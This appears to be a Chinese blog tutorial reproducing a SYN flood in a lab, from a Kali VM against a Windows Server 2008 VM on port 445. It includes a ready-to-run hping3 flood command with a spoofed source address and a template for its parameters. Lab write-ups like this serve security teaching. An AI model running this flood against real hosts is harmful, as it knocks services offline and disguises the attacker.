SYN Flood 的攻击复现(对445端口进行攻击)

SYN Flood 的攻击复现(对445端口进行攻击)

前言

直接攻击

直接攻击IP地址不被欺骗的SYN Flood被称为直接攻击。在这次攻击中,攻击者根本不掩盖其IP地址。由于攻击者使用具有真实IP地址的单个源设备来创建攻击,因此攻击者极易受到发现和缓解的影响。为了在目标机器上创建半开状态,黑客可以防止其机器响应服务器的SYN-ACK数据包。这通常是通过阻止除SYN数据包之外的传出数据包的防火墙规则来实现的,或者在到达恶意用户机器之前过滤任何传入的SYN-ACK数据包。实际上,这种方法很少使用(如果有的话),因为减轻是非常简单的 – 只是阻止每个恶意系统的IP地址。

1、攻击前的准备

攻击机:kali (172.16.129.46)

靶机:winserver 2008(172.16.129.175)

确保两者能够互相ping通(就是要处于同一个网段之下)

SYN Flood 的攻击复现(对445端口进行攻击)_第1张图片

注意:如果修改了,就要重新启动虚拟机方可生效

SYN Flood 的攻击复现(对445端口进行攻击)_第2张图片

ping一下,验证成功

SYN Flood 的攻击复现(对445端口进行攻击)_第3张图片

2、开始攻击

2.1、打开kali(攻击机)和windowsever2008(目标靶机)

SYN Flood 的攻击复现(对445端口进行攻击)_第4张图片

2.2 先打开windows server2008的命令管理器

SYN Flood 的攻击复现(对445端口进行攻击)_第5张图片

2.3然后发起攻击

输入

hping3 -q -n -a 2.2.2.2 -S -s 53 --keep -p 445 --flood 172.16.129.175

hping3 -q -n -a 伪造源IP -S -s 伪造源端口 --keep -p 目的端口 --flood 目的IP

SYN Flood 的攻击复现(对445端口进行攻击)_第6张图片

等待一段时间后,ctrl+c 取消攻击

由于攻击过程卡住无法截图,停止攻击后可以观察:

windows server2008的命令管理器

SYN Flood 的攻击复现(对445端口进行攻击)_第7张图片

你可能感兴趣的:(笔记,经验分享,网络安全,安全)